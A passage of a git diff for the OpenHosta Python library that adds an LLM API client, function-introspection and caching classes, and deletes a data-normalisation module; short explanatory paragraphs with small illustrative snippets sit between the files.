+ r"^(?:http|ftp)s?://"
+ r"(?:(?:[A-Z0-9](?:[A-Z0-9-]{0,61}[A-Z0-9])?\.)+(?:[A-Z]{2,6}\.?|[A-Z0-9-]{2,}\.?)|"
+ r"localhost|"
+ r"\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}|"
+ r"\[?[A-F0-9]*:[A-F0-9:]+\]?)"
+ r"(?::\d+)?"
+ r"(?:/?|[/?]\S+)$",
+ re.IGNORECASE,
+ )
+ return re.match(regex, url) is not None
+
+
+class Model:
+
+ _SYS_PROMPT = ""
+
+ def __init__(self, model: str = None, base_url: str = None, api_key: str = None):
+ self.model = model
+ self.base_url = base_url
+ self.api_key = api_key
+ self._last_request = None
+ self._used_tokens = 0
+ self._nb_requests = 0
+
+ if any(var is None for var in (model, base_url)):
+            raise ValueError("[Model.__init__] Missing values.")
+        elif not is_valid_url(self.base_url):
+            raise ValueError("[Model.__init__] Invalid URL.")
+
+ def simple_api_call(
+ self,
+ sys_prompt: str,
+ user_prompt: str,
+ json_form: bool = True,
+ **llm_args
+ ) -> Dict:
+ return self.api_call(
+ [
+ {"role": "system", "content": sys_prompt},
+ {"role": "user", "content": user_prompt}
+ ],
+ json_form,
+ **llm_args
+ )
+
+ def api_call(
+ self,
+ messages: list[dict[str, str]],
+ json_form: bool = True,
+ **llm_args
+ ) -> Dict:
+ if self.api_key is None or not self.api_key:
+ raise ApiKeyError("[model.api_call] Empty API key.")
+
+ l_body = {
+ "model": self.model,
+ "messages": messages,
+ }
+ headers = {
+ "Content-Type": "application/json"
+ }
+
+ if "azure.com" in self.base_url:
+ headers |= {"api-key": f"{self.api_key}"}
+ else:
+ headers |= {"Authorization": f"Bearer {self.api_key}"}
+
+ if json_form:
+ l_body["response_format"] = {"type": "json_object"}
+ for key, value in llm_args.items():
+ l_body[key] = value
+        try:
+            response = requests.post(self.base_url, headers=headers, json=l_body, timeout=30)
+        except requests.RequestException as e:
+            raise RequestError(f"[Model.api_call] Request failed:\n{e}\n")
+
+        if response.status_code != 200:
+            response_text = response.text
+            if "invalid_api_key" in response_text:
+                raise ApiKeyError("[Model.api_call] Incorrect API key.")
+            raise RequestError(
+                f"[Model.api_call] API call was unsuccessful.\n"
+                f"Status code: {response.status_code}:\n{response_text}"
+            )
+        self._nb_requests += 1
+        return response.json()
+
+ def request_handler(self, response: Dict, func: Func) -> Any:
+ json_string = response["choices"][0]["message"]["content"]
+ if "usage" in response:
+ self._used_tokens += int(response["usage"]["total_tokens"])
+ try:
+ l_ret_data = json.loads(json_string)
+ except json.JSONDecodeError as e:
+            sys.stderr.write(
+                f"[Model.request_handler] JSONDecodeError: {e}\nRetrying after stripping code fences.\n")
+            l_cleaned = "\n".join(json_string.split("\n")[1:-1])
+            l_ret_data = json.loads(l_cleaned)
+ return HostaChecker(func, l_ret_data).check()
+
+
+class DefaultModel:
+ _instance = None
+
+ def __new__(cls, *args, **kwargs):
+        if cls._instance is None:
+            cls._instance = super().__new__(cls)
+        return cls._instance
+
+ def __init__(self):
+ if not hasattr(self, "model"):
+ self.model = None
+
+ def set_default_model(self, new):
+ if isinstance(new, Model):
+ self.model = new
+ else:
+ sys.stderr.write("[CONFIG_ERROR] Invalid model instance.\n")
+
+    def set_default_apiKey(self, api_key=None):
+        if isinstance(api_key, str):
+            self.model.api_key = api_key
+        else:
+            sys.stderr.write("[CONFIG_ERROR] Invalid API key.\n")
+
+ def get_default_model(self):
+ return self.model
+
+
+DefaultManager = DefaultModel()
+
+
+def set_default_model(new):
+ DefaultManager.set_default_model(new)
+
+
+def set_default_apiKey(api_key=None):
+ DefaultManager.set_default_apiKey(api_key)
+
+# TODO: annotations, error handling, documentation
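The `is_valid_url` helper in `config.py` above is a plain regex check over scheme, host, optional port, and path. A standalone sketch of the same idea (the pattern here is abridged and illustrative, not the exact regex used in the file):

```python
import re

# Abridged URL pattern: scheme, host (dotted domain, localhost, or IPv4),
# optional port, optional path. Illustrative only -- the pattern in
# config.py is stricter.
_URL_RE = re.compile(
    r"^(?:http|ftp)s?://"                  # scheme
    r"(?:[A-Z0-9-]+(?:\.[A-Z0-9-]+)+|"     # dotted domain
    r"localhost|"                          # localhost
    r"\d{1,3}(?:\.\d{1,3}){3})"            # IPv4 address
    r"(?::\d+)?"                           # optional port
    r"(?:/\S*)?$",                         # optional path
    re.IGNORECASE,
)

def is_valid_url(url: str) -> bool:
    return _URL_RE.match(url) is not None
```

Validating the base URL up front, as `Model.__init__` does, turns a misconfigured endpoint into an immediate `ValueError` instead of a confusing request failure later.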
diff --git a/src/OpenHosta/core/hosta.py b/src/OpenHosta/core/hosta.py
new file mode 100644
index 0000000..37933b7
--- /dev/null
+++ b/src/OpenHosta/core/hosta.py
@@ -0,0 +1,217 @@
+from __future__ import annotations
+
+from typing import List, Optional
+
+from .analizer import FuncAnalizer
+from .inspector import HostaInspector
+from .pydantic_usage import Func
+from ..utils.errors import InvalidStructureError
+from ..utils.hosta_type import MemoryNode, MemKey, MemValue, ExampleType, CotType
+import hashlib
+
+__all__ = (
+ "Hosta",
+ "Func",
+ "UseType",
+ "MemKey",
+ "MemValue",
+ "MemoryNode"
+)
+
+
+class Hosta(HostaInspector):
+ """
+ Hosta is a class that extends HostaInspector and provides functionality for analyzing
+ and storing information about the calling function.
+
+ This class implements a singleton pattern and uses introspection to gather details
+ about the callable that called the function that instantiated it.
+
+    If several functions instantiate it within the same callable, the first one creates
+    the instance and attaches it to the callable so that the following ones can retrieve it.
+
+ Attributes:
+ _initialized (bool): Flag to track if the instance has been initialized.
+ _obj (tuple): Stores the result of the _extend method call.
+ _infos (Func): Stores detailed information about the analyzed function.
+ """
+ _initialized = False
+ _obj = None
+
+ def __new__(cls, *args, **kwargs) -> 'Hosta':
+ """
+ Create a new instance of Hosta or return the existing one if already created.
+
+ This method implements the singleton pattern, ensuring only one instance of Hosta exists.
+ It also handles the initialization of the instance when first created.
+
+ Args:
+ *args: Variable length argument list.
+ **kwargs: Arbitrary keyword arguments.
+                These are the arguments passed through to __init__().
+
+ Returns:
+ Hosta: The single instance of the Hosta class.
+ """
+ cls._obj = cls._extend()
+ if cls._obj[0] is None:
+            raise InvalidStructureError(
+                "[Hosta.__new__] The function {} must be called inside a function or method."
+                .format(cls._extend(back_level=2)[0].__name__)
+            )
+ if (hasattr(cls._obj[0], "Hosta")):
+ return cls._obj[0].Hosta
+ instance = super().__new__(cls)
+ cls._attach(cls._obj[0], {"Hosta": instance})
+ return instance
+
+ def __init__(self, *, caller_analysis: bool = True):
+ """
+ Initialize the Hosta instance.
+
+ This method is called after __new__ and sets up the instance attributes.
+ It also triggers the function analysis if caller_analysis is True.
+
+ Args:
+ caller_analysis (bool): If True, analyze the calling function. Defaults to True.
+ """
+ if not self._initialized:
+ super().__init__()
+ self._initialized = True
+ self._infos = Func()
+ if caller_analysis:
+ self._get_infos_func()
+
+ def _get_infos_func(self) -> None:
+ """
+ Analyze and store information about the calling function.
+
+ This method uses FuncAnalizer to extract various details about the function
+ that called the Hosta instance, including its name, definition, call signature,
+        arguments, types, and local variables. This information is used throughout OpenHosta's functions.
+
+ The extracted information is stored in the _infos attribute of the instance.
+ """
+ analizer = FuncAnalizer(self._obj[0], self._obj[1])
+ self._infos.f_obj = self._obj[0]
+ self._infos.f_name = self._obj[0].__name__
+ self._infos.f_doc = self._obj[0].__doc__
+ self._infos.f_def = analizer.func_def
+ self._infos.f_call, self._infos.f_args = analizer.func_call
+ self._infos.f_type = analizer.func_type
+ self._infos.f_locals, self._infos.f_self = analizer.func_locals
+ self._infos.f_schema = analizer.func_schema
+ self._infos.f_sig = analizer.sig
+
+ def _update_call(self):
+ analizer = FuncAnalizer(self._obj[0], self._obj[1])
+ self._infos.f_call, self._infos.f_args = analizer.func_call
+ return self
+
+
+ def _bdy_add(self, key: MemKey, value: MemValue) -> None:
+ """
+ Add a new memory node to the function's memory.
+
+ This method creates a new MemoryNode with the given key and value,
+ and appends it to the function's memory list. If the memory list
+ doesn't exist, it initializes it.
+
+ Args:
+ key (MemKey): The type of memory node ('ex', 'cot', or 'use').
+ value (MemValue): The value to be stored in the memory node.
+ """
+        seen: List[MemKey] = []
+        previous: Optional[MemoryNode] = None
+
+        if self._infos.f_mem is None:
+            self._infos.f_mem = []
+        node_id = sum(1 for node in self._infos.f_mem if node.key == key)
+        new = MemoryNode(key=key, id=node_id, value=value)
+ self._infos.f_mem.append(new)
+ previous = new
+ for node in self._infos.f_mem:
+ if node.key not in seen:
+ seen.append(node.key)
+ previous = node
+ elif node.key in seen and node.key == previous.key:
+ previous = node
+ else:
+                raise InvalidStructureError(
+                    "[Hosta._bdy_add] Inconsistent function structure. Group your OpenHosta calls into contiguous blocks.")
+
+ def _bdy_get(self, key: MemKey) -> List[MemoryNode]:
+ """
+ Retrieve memory nodes of a specific type from the function's memory.
+
+ This method searches through the function's memory list and returns
+ all nodes that match the given key.
+
+ Args:
+ key (MemKey): The type of memory node to retrieve ('ex', 'cot', or 'use').
+
+ Returns:
+ List[MemoryNode]: A list of memory nodes matching the key, or None if no matches are found.
+ """
+ l_list: List[MemoryNode] = []
+
+ if self._infos.f_mem is None:
+ return None
+ for node in self._infos.f_mem:
+ if node.key == key:
+ l_list.append(node)
+ return l_list if l_list != [] else None
+
+ @property
+ def example(self) -> Optional[List[ExampleType]]:
+ """
+ Retrieve all example nodes from the function's memory.
+
+ This property method uses _bdy_get to fetch all memory nodes with the 'ex' key.
+
+ Returns:
+ Optional[List[ExampleType]]: A list of example nodes, or None if no examples are found.
+ """
+ nodes = self._bdy_get(key="ex")
+ return [node.value for node in nodes] if nodes else None
+
+ @property
+ def cot(self) -> Optional[List[CotType]]:
+ """
+ Retrieve all chain-of-thought (cot) nodes from the function's memory.
+
+ This property method uses _bdy_get to fetch all memory nodes with the 'cot' key.
+
+ Returns:
+ Optional[List[CotType]]: A list of chain-of-thought nodes, or None if no cot nodes are found.
+ """
+ nodes = self._bdy_get(key="cot")
+ return [node.value for node in nodes] if nodes else None
+
+ @property
+ def infos(self):
+ return self._infos
+
+ @staticmethod
+ def hash_func(func: Func) -> str:
+        """
+        Generate a stable hash value for a function without using Python's builtin hash().
+
+        The digest is computed from func.f_def and func.f_type only, so it stays
+        the same as long as the function's definition and annotations are unchanged.
+
+ Args:
+ func (object): The function to hash.
+
+ Returns:
+ str: The hash value of the function.
+ """
+ return hashlib.md5(
+ str(func.f_def).encode() +
+ str(func.f_type).encode()
+ ).hexdigest()
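`hash_func` keys its digest on only `f_def` and `f_type`, so two analyses of an unchanged function hash identically while a signature change produces a new hash. A minimal sketch of that behaviour, using plain strings in place of a `Func` object:

```python
import hashlib

def hash_signature(f_def: str, f_type: str) -> str:
    # Mirror of Hosta.hash_func: md5 over the definition and type strings,
    # deliberately ignoring call-site details such as arguments or locals.
    return hashlib.md5(f_def.encode() + f_type.encode()).hexdigest()

a = hash_signature("def add(a: int, b: int) -> int:", "([int, int], int)")
b = hash_signature("def add(a: int, b: int) -> int:", "([int, int], int)")
c = hash_signature("def add(a: float, b: float) -> float:", "([float, float], float)")
```

This makes the hash a natural cache key: cached results survive re-runs of an unmodified function but are invalidated when its definition or types change.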
diff --git a/src/OpenHosta/core/inspector.py b/src/OpenHosta/core/inspector.py
new file mode 100644
index 0000000..ffc6819
--- /dev/null
+++ b/src/OpenHosta/core/inspector.py
@@ -0,0 +1,166 @@
+from __future__ import annotations
+
+from typing import Tuple, Callable, Optional, Dict, Any, Union
+from types import FrameType, CodeType, MethodType
+import inspect
+
+from ..utils.errors import FrameError
+
+__all__ = (
+    "HostaInspector",
+)
+
+
+class HostaInspector:
+ """
+    This class is the parent class for much of OpenHosta's functionality.
+    It provides methods that are used in many places.
+ """
+
+ def __init__(self):
+ pass
+
+ @staticmethod
+ def _extend(*, back_level: int = 3) -> Tuple[Union[Callable, MethodType], FrameType]:
+ """
+ Retrieves the callable object and the frame from which this method is called.
+
+ This method navigates up the call stack to find the function or method that called it.
+ It can retrieve the callable object from both class methods and standalone functions.
+
+ This method uses introspection to examine the call stack and local variables.
+ It may not work correctly in all execution environments or with all types of callable objects.
+
+ Args:
+ - back_level (int, optional): The number of frames to go back in the call stack.
+          Defaults to 3. Must be a non-zero positive integer.
+
+ Returns:
+ Tuple[Callable, FrameType]: A tuple containing:
+ - The callable object (function or method) that called this method.
+ - The frame object of the caller.
+ """
+        if not isinstance(back_level, int) or back_level <= 0:
+            raise ValueError(
+                "[HostaInspector._extend] back_level must be a non-zero positive integer.")
+
+ def _get_obj_from_class(caller: FrameType) -> Optional[Callable]:
+ """
+ Search for the callable object when it is called within a class method.
+
+ This function attempts to retrieve the method from the 'self' object
+ in the caller's local variables. It's designed for internal use only,
+ within the _extend method.
+
+ Args:
+ caller (FrameType): The frame object of the calling method.
+
+ Returns:
+ Callable: The unwrapped method object if found, otherwise None.
+ """
+ func: Union[Callable, MethodType]
+
+ obj = caller.f_locals["self"]
+ func = getattr(obj, caller_name, None)
+ return inspect.unwrap(func) if func else None
+
+ def _get_obj_from_func(
+ caller: FrameType,
+ code: CodeType,
+ name: str
+ ) -> Optional[Callable]:
+ """
+ Search for the callable object when it is called within a function.
+
+ This function traverses the call stack, examining local and global variables
+ to find the function that matches the given code object. It's designed for
+ internal use only, within the _extend method.
+
+ Args:
+ - caller (FrameType): The frame object of the calling function.
+ - code (CodeType): The code object of the calling function.
+ - name (str): The name of the calling function.
+
+ Returns:
+ Callable: The unwrapped function object if found, otherwise None.
+ """
+ func: Union[Callable, MethodType]
+ l_caller: FrameType = caller
+
+            while l_caller.f_back is not None:
+ for obj in l_caller.f_back.f_locals.values():
+ try:
+ if hasattr(obj, "__code__"):
+ if obj.__code__ == code:
+ return obj
+                except Exception:
+ continue
+ l_caller = l_caller.f_back
+ func = caller.f_globals.get(name)
+ return inspect.unwrap(func) if func else None
+
+ func: Union[Callable, MethodType]
+ current: Optional[FrameType] = inspect.currentframe()
+
+ if current is None:
+            raise FrameError(
+                "[HostaInspector._extend] Current frame can't be found.")
+ for k in range(back_level):
+ current = current.f_back
+ if current is None:
+ raise FrameError(
+ f"[HostaInspector._extend] Frame can't be found (level: {k})")
+
+ caller = current
+ caller_name = caller.f_code.co_name
+ caller_code = caller.f_code
+ caller_args = inspect.getargvalues(caller)
+
+ is_likely_method = "self" in caller.f_locals or\
+ 'cls' in caller.f_locals or\
+ (caller_args.args and caller_args.args[0] in ['self', 'cls'])
+ if is_likely_method:
+ func = _get_obj_from_class(caller)
+ else:
+ func = _get_obj_from_func(caller, caller_code, caller_name)
+
+        if func is not None and not callable(func):
+            raise FrameError(
+                "[HostaInspector._extend] The found object isn't callable.")
+
+ return (func, caller)
+
+ @staticmethod
+ def _attach(obj: Callable, attr: Dict[str, Any]) -> Optional[bool]:
+ """
+ Attaches attributes to a function or method.
+
+ This method attempts to add new attributes to a callable object (function or method).
+ For methods, it attaches the attributes to the underlying function object.
+ Only supports attaching to functions and methods. Other callable types will raise an AttributeError.
+
+ Args:
+ - obj (Callable): The function or method to which the attribute will be attached.
+ - attr (Dict[str, Any]): The dictionary of the attributes to attach.
+
+        Returns:
+            Optional[bool]: True if the attributes were successfully attached; raises an exception otherwise.
+ """
+ if not callable(obj) or not isinstance(attr, dict):
+ raise ValueError("[HostaInspector._attach] Invalid arguments")
+
+ def attr_parser(obj: Callable, attr: Dict[str, Any]) -> None:
+ for key, value in attr.items():
+ setattr(obj, key, value)
+
+ if inspect.ismethod(obj):
+ if hasattr(obj, "__func__"):
+ attr_parser(obj.__func__, attr)
+ return True
+            raise AttributeError(
+                "[HostaInspector._attach] Failed to attach attributes: \"__func__\" attribute is missing.")
+ elif inspect.isfunction(obj):
+ attr_parser(obj, attr)
+ return True
+        raise AttributeError(
+            f"[HostaInspector._attach] Failed to attach attributes. Object's type not supported: {type(obj)}.")
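`_extend` recovers the calling function by walking frame objects with `inspect`. A much-reduced sketch of the same lookup for the plain-function case (module-level callers only; no methods, closures, or decorators, which the real `_extend` also handles):

```python
import inspect

def who_called_me():
    # One frame up is the caller of this helper; resolve its function
    # object from the caller's globals by name, as _extend does as a
    # fallback in _get_obj_from_func.
    frame = inspect.currentframe().f_back
    func = frame.f_globals.get(frame.f_code.co_name)
    return inspect.unwrap(func) if func else None

def example():
    return who_called_me()
```

Calling `example()` returns the `example` function object itself, which is exactly what lets `Hosta.__new__` attach cached state onto the function that invoked it.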
diff --git a/src/OpenHosta/core/memory.py b/src/OpenHosta/core/memory.py
new file mode 100644
index 0000000..964c211
--- /dev/null
+++ b/src/OpenHosta/core/memory.py
@@ -0,0 +1,32 @@
+import os
+from typing import Optional
+
+class HostaMemory:
+ """
+ Base class for persistent memory management.
+ """
+ _instances = {}
+ CACHE_DIR = "__hostacache__"
+
+ def __init__(self, base_path: Optional[str] = None, **kwargs):
+ pass
+
+ def __new__(cls, base_path: Optional[str] = None, **kwargs):
+ if cls not in cls._instances:
+ cls._instances[cls] = super(HostaMemory, cls).__new__(cls)
+ cls._instances[cls]._initialized = False
+ if base_path is not None and not cls._instances[cls]._initialized:
+ cls._instances[cls]._initialize(base_path)
+ return cls._instances[cls]
+
+ def _initialize(self, base_path: str) -> None:
+ """Initializes the hostacache directory"""
+ self.cache_root = os.path.join(base_path, self.CACHE_DIR)
+ self._initialized = True
+ self._ensure_directory_exists(self.cache_root)
+
+
+    def _ensure_directory_exists(self, directory) -> None:
+        """Creates the base directory if necessary"""
+        os.makedirs(directory, exist_ok=True)
\ No newline at end of file
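`HostaMemory` keeps one instance per concrete subclass by keying `_instances` on the class, rather than using a single `_instance` slot. A minimal sketch of that pattern (class names here are illustrative, not from the codebase):

```python
class PerClassSingleton:
    # Keyed by the concrete class, so each subclass gets its own instance
    # while still sharing the singleton machinery from the base class.
    _instances = {}

    def __new__(cls, *args, **kwargs):
        if cls not in cls._instances:
            cls._instances[cls] = super().__new__(cls)
        return cls._instances[cls]

class CacheA(PerClassSingleton):
    pass

class CacheB(PerClassSingleton):
    pass
```

With a plain `_instance` attribute on the base class, the first subclass constructed would also be returned for every other subclass; the dict keyed by `cls` avoids that.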
diff --git a/src/OpenHosta/core/pydantic_usage.py b/src/OpenHosta/core/pydantic_usage.py
new file mode 100644
index 0000000..807e3cc
--- /dev/null
+++ b/src/OpenHosta/core/pydantic_usage.py
@@ -0,0 +1,75 @@
+from __future__ import annotations
+
+import inspect
+from typing import Optional, Dict, Tuple, List, Any
+
+from ..utils.hosta_type import MemoryNode
+from ..utils.import_handler import is_pydantic
+
+if is_pydantic:
+ from pydantic import BaseModel, Field, ConfigDict, create_model
+
+
+ def convert_pydantic(caller, checked) -> Optional[BaseModel]:
+ """
+        Convert the checked data into the caller's Pydantic model when applicable.
+
+ Returns:
+ Optional[BaseModel]: The converted checked data based on the Pydantic model annotations.
+ """
+ try:
+ if issubclass(caller, BaseModel):
+ return caller(**checked)
+ return checked
+        except Exception:
+ return checked
+
+
+ class Func(BaseModel):
+ """
+ Func is a Pydantic model representing a function's metadata.
+ Useful for the executive functions and the post-processing.
+ """
+ model_config = ConfigDict(arbitrary_types_allowed=True)
+ f_obj: Optional[object] = Field(default=None)
+ f_def: str = Field(default="", description="Simple definition of the function, e.g., 'def func(a:int, b:str)->int:'")
+ f_name: str = Field(default="", description="Name of the function, e.g., 'func'")
+ f_doc: str = Field(default="", description="Documentation of the function, e.g., 'This function returns the sum of two integers.'")
+ f_call: str = Field(default="", description="Actual call of the function, e.g., 'func(1, 'hello')'")
+ f_args: Dict[str, Any] = Field(default_factory=dict, description="Arguments of the function, e.g., {'a': 1, 'b': 'hello'}")
+ f_type: Tuple[List[Any], Any] = Field(default_factory=lambda: ([], None), description="Desired type of the _inputs and _outputs of the function")
+ f_schema: Dict[str, Any] = Field(default_factory=dict, description="Dictionary describing the function's return type (in case of pydantic).")
+ f_sig: Optional[inspect.Signature] = Field(default=None, description="Signature of the function")
+ f_locals: Optional[Dict[str, Any]] = Field(default=None, description="Local variables within the function's scope")
+ f_self: Optional[Dict[str, Any]] = Field(default=None)
+ f_mem: Optional[List[MemoryNode]] = Field(default=None, description="Memory nodes associated with the function, contains examples, chain of thought...")
+
+
+ def get_pydantic_schema(return_caller) -> Optional[Dict[str, Any]]:
+ """
+ Get the JSON schema of the function's return type.
+
+ Returns:
+ The JSON schema of the function's return type.
+ """
+ try:
+ if issubclass(return_caller, BaseModel):
+ return return_caller.model_json_schema()
+ return None
+        except Exception:
+ return None
+
+else:
+ class Func:
+ f_obj: Optional[object] = None
+ f_def: str = ""
+ f_name: str = ""
+ f_doc: str = ""
+ f_call: str = ""
+ f_args: Dict[str, Any] = {}
+ f_type: Tuple[List[Any], Any] = ([], None)
+ f_schema: Dict[str, Any] = {}
+ f_sig: Optional[inspect.Signature] = None
+ f_locals: Optional[Dict[str, Any]] = None
+ f_self: Optional[Dict[str, Any]] = None
+ f_mem: Optional[List[MemoryNode]] = None
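The whole file hinges on the `is_pydantic` flag to swap the rich Pydantic `Func` model for a plain fallback class. The optional-dependency check itself can be sketched with `importlib` (names here are illustrative, not the actual `import_handler` code):

```python
import importlib.util

# Detect an optional dependency without importing it eagerly; find_spec
# returns None when the package is not installed.
HAS_PYDANTIC = importlib.util.find_spec("pydantic") is not None

if HAS_PYDANTIC:
    def describe():
        return "rich Func model backed by pydantic.BaseModel"
else:
    def describe():
        return "plain fallback Func class, no validation"
```

Branching at import time like this keeps the rest of the codebase free of `try: import pydantic` scaffolding: callers just use `Func` and get validation when Pydantic is available.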
diff --git a/src/OpenHosta/datapreparator.py b/src/OpenHosta/datapreparator.py
deleted file mode 100644
index ad21f6d..0000000
--- a/src/OpenHosta/datapreparator.py
+++ /dev/null
@@ -1,241 +0,0 @@
-import torch
-from torch.utils.data import DataLoader
-import os
-import json
-import csv
-import numpy as np
-
-from .encoder import HostaEncoder
-from .decoder import HostaDecoder
-
-class Datapreparator():
- def __init__(self, norm_max, norm_min, encoder=None, decoder=None):
- self.encoder = encoder if encoder else HostaEncoder()
- self.decoder = decoder if decoder else HostaDecoder()
-
- if norm_min:
- self.norm_min = norm_min
- else:
- self.norm_min = 0.1
- if norm_max:
- self.norm_max = norm_max
- else:
- self.norm_max = 1.0
-
- self.data_min_nonzero = None
- self.data_max = None
- self.data_min = None
- self.data_range = None
-
- self.prediction_min_nonzero = None
- self.prediction_max = None
- self.prediction_min = None
- self.prediction_range = None
-
- def prepare_input(self, in_value):
- input_data = []
- for key, value in in_value.items():
- if isinstance(value, dict):
- for sub_key, sub_value in value.items():
- parsed_value = self.encoder.encode(sub_value)
- input_data.extend(parsed_value)
- elif isinstance(value, list):
- for item in value:
- parsed_value = self.encoder.encode(item)
- input_data.extend(parsed_value)
- else:
- parsed_value = self.encoder.encode(value)
- input_data.extend(parsed_value)
- return input_data
-
- def prepare(self, function_infos, prediction):
- train = []
- val = []
- if function_infos["ho_example"] == [] and function_infos["ho_data"] == []:
- raise ValueError("No example provided please provide at least one example for the model")
-
- if function_infos["ho_data"] != []:
- for example in function_infos["ho_data"]:
- value = self.parse_dict(example, prediction)
- train.extend(value)
- if function_infos["ho_example"] != []:
- for example in function_infos["ho_example"]:
- value = self.parse_dict(example, prediction)
- val.extend(value)
- else:
- for example in function_infos["ho_example"]:
- value = self.parse_dict(example, prediction)
- train.extend(value)
- return train, val
-
- def normalize_dataset(self, train, val):
- dataset = train + val if val != [] else train
- data_values = [example[0] for example in dataset]
- prediction_values = [example[1] for example in dataset]
-
- data_array = np.array(data_values)
- prediction_array = np.array(prediction_values)
-
- negative_data = np.any(data_array < 0, axis=0)
- negative_prediction = np.any(prediction_array < 0, axis=0)
-
- self.data_min_nonzero = np.array([
- np.min(data_array[:, i][data_array[:, i] > 0]) if not negative_data[i] and np.any(data_array[:, i] > 0) else 0
- for i in range(data_array.shape[1])])
- self.data_max = data_array.max(axis=0)
- self.data_min = data_array.min(axis=0)
-
- self.prediction_min_nonzero = np.array([
- np.min(prediction_array[:, i][prediction_array[:, i] > 0]) if not negative_prediction[i] and np.any(prediction_array[:, i] > 0) else 0
- for i in range(prediction_array.shape[1])])
- self.prediction_max = prediction_array.max(axis=0)
- self.prediction_min = prediction_array.min(axis=0)
-
- self.data_range = self.data_max - self.data_min_nonzero
- self.data_range[self.data_range == 0] = 1
-
- self.prediction_range = self.prediction_max - self.prediction_min_nonzero
- self.prediction_range[self.prediction_range == 0] = 1
-
- normalized_data = np.zeros_like(data_array)
- for i in range(data_array.shape[1]):
- zero_mask = data_array[:, i] == 0
- normalized_data[:, i] = np.where(zero_mask, 0.0, self.norm_min + ((data_array[:, i] - self.data_min_nonzero[i]) / self.data_range[i]) * (self.norm_max - self.norm_min))
-
- normalized_prediction = np.zeros_like(prediction_array)
- for i in range(prediction_array.shape[1]):
- zero_mask = prediction_array[:, i] == 0
- normalized_prediction[:, i] = np.where(zero_mask, 0.0, self.norm_min + ((prediction_array[:, i] - self.prediction_min_nonzero[i]) / self.prediction_range[i]) * (self.norm_max - self.norm_min))
-
- # Maybe unwrap the tolist, stay for now because only work after with list
- normalized_dataset = list(zip(normalized_data.tolist(), normalized_prediction.tolist()))
- train = normalized_dataset[:len(train)]
- val = normalized_dataset[len(train):] if val else None
- return train, val
-
- def normalize_inference(self, inference_data):
- inference_data = np.array(inference_data)
-
- normalized_inference = np.zeros_like(inference_data)
- for i in range(len(inference_data)):
- if inference_data[i] == 0:
- normalized_inference[i] = 0.0
- else:
- normalized_inference[i] = self.norm_min + ((inference_data[i] - self.data_min_nonzero[i]) / self.data_range[i]) * (self.norm_max - self.norm_min)
-
- return normalized_inference.tolist()
-
- def denormalize_prediction(self, prediction):
- prediction = prediction.detach().cpu().numpy()
-
- denormalized_prediction = np.zeros_like(prediction)
- for i in range(len(prediction)):
- if prediction[i] == 0:
- denormalized_prediction[i] = 0.0
- else:
- denormalized_prediction[i] = self.prediction_min_nonzero[i] + ((prediction[i] - self.norm_min) / (self.norm_max - self.norm_min)) * self.prediction_range[i]
-
- return denormalized_prediction.tolist()
-
- def save_normalization_params(self, path):
- params = {
- 'norm_min': self.norm_min,
- 'norm_max': self.norm_max,
- 'data_min_nonzero': self.data_min_nonzero.tolist(),
- 'data_max': self.data_max.tolist(),
- 'data_min': self.data_min.tolist(),
- 'data_range': self.data_range.tolist(),
- 'prediction_min_nonzero': self.prediction_min_nonzero.tolist(),
- 'prediction_max': self.prediction_max.tolist(),
- 'prediction_min': self.prediction_min.tolist(),
- 'prediction_range': self.prediction_range.tolist()
- }
- with open(path, 'w') as f:
- json.dump(params, f)
-
- def load_normalization_params(self, path):
- try:
- with open(path, 'r') as f:
- params = json.load(f)
- self.norm_min = params['norm_min']
- self.norm_max = params['norm_max']
- self.data_min_nonzero = np.array(params['data_min_nonzero'])
- self.data_max = np.array(params['data_max'])
- self.data_min = np.array(params['data_min'])
- self.data_range = np.array(params['data_range'])
- self.prediction_min_nonzero = np.array(params['prediction_min_nonzero'])
- self.prediction_max = np.array(params['prediction_max'])
- self.prediction_min = np.array(params['prediction_min'])
- self.prediction_range = np.array(params['prediction_range'])
- except Exception as e:
- raise IOError(f"An error occurred while loading the normalization parameters: {e}")
-
- def convert(self, inference):
- return torch.tensor(inference, dtype=torch.float32)
-
- def split(self, train_normalization, val_normalization, batch_size):
- datatensor = []
-
- for examples in train_normalization:
- feature_tensor = torch.tensor(examples[0], dtype=torch.float32)
- label_tensor = torch.tensor(examples[1], dtype=torch.float32)
-
- tensor = [feature_tensor, label_tensor]
- datatensor.append(tensor)
-
- train = DataLoader(datatensor, batch_size=batch_size, shuffle=True)
-
- if val_normalization:
- valtensor = []
- for examples in val_normalization:
- feature_tensor = torch.tensor(examples[0], dtype=torch.float32)
- label_tensor = torch.tensor(examples[1], dtype=torch.float32)
-
- tensor = [feature_tensor, label_tensor]
- valtensor.append(tensor)
- val = DataLoader(valtensor, batch_size=batch_size, shuffle=False)
- else : val = None
- return train, val
-
- def parse_dict(self, example, prediction):
- dataset = []
- input_data = []
- output_data = []
- for key, value in example.items():
- if key in prediction or key == "hosta_out":
- parsed_value = self.encoder.encode(value)
- output_data.extend(parsed_value)
- else:
- parsed_value = self.encoder.encode(value)
- input_data.extend(parsed_value)
- dataset.append([input_data, output_data])
- return dataset
-
-def open_file(ho_examples):
- list_of_examples = []
- for path in ho_examples:
- _, file_extension = os.path.splitext(path)
- try:
- if file_extension == '.jsonl':
- with open(path, "r") as file:
- for line in file:
- example = json.loads(line.strip())
- list_of_examples.append(example)
-
- elif file_extension == '.csv':
- with open(path, "r", newline='') as file:
- csv_reader = csv.DictReader(file)
- for row in csv_reader:
- list_of_examples.append(row)
-
- elif file_extension == '.txt':
- with open(path, "r") as file:
- for line in file:
- list_of_examples.append(line.strip())
-
- else:
- raise ValueError("Unsupported file type. Please provide a JSONL, CSV, or TXT file.")
-
- except Exception as e:
- raise IOError(f"An error occurred while processing the file: {e}")
- return list_of_examples
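For reference, the removed `Datapreparator.normalize_dataset` mapped nonzero feature values into `[norm_min, norm_max]` while pinning exact zeros at 0.0. The core transform can be sketched without NumPy (an illustrative reconstruction, not the deleted implementation):

```python
def minmax_normalize(values, norm_min=0.1, norm_max=1.0):
    # Range is computed over the nonzero values only; zeros stay exactly
    # 0.0, mirroring the zero_mask handling in the removed code.
    nonzero = [v for v in values if v != 0]
    lo, hi = min(nonzero), max(nonzero)
    rng = (hi - lo) or 1  # guard against a constant (zero-range) column
    return [
        0.0 if v == 0 else norm_min + ((v - lo) / rng) * (norm_max - norm_min)
        for v in values
    ]

scaled = minmax_normalize([0, 2, 4, 6])
```

Reserving 0.0 for "absent" values while squeezing real values into `[0.1, 1.0]` lets the model distinguish a missing feature from a legitimately small one.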
diff --git a/src/OpenHosta/decoder.py b/src/OpenHosta/decoder.py
deleted file mode 100644
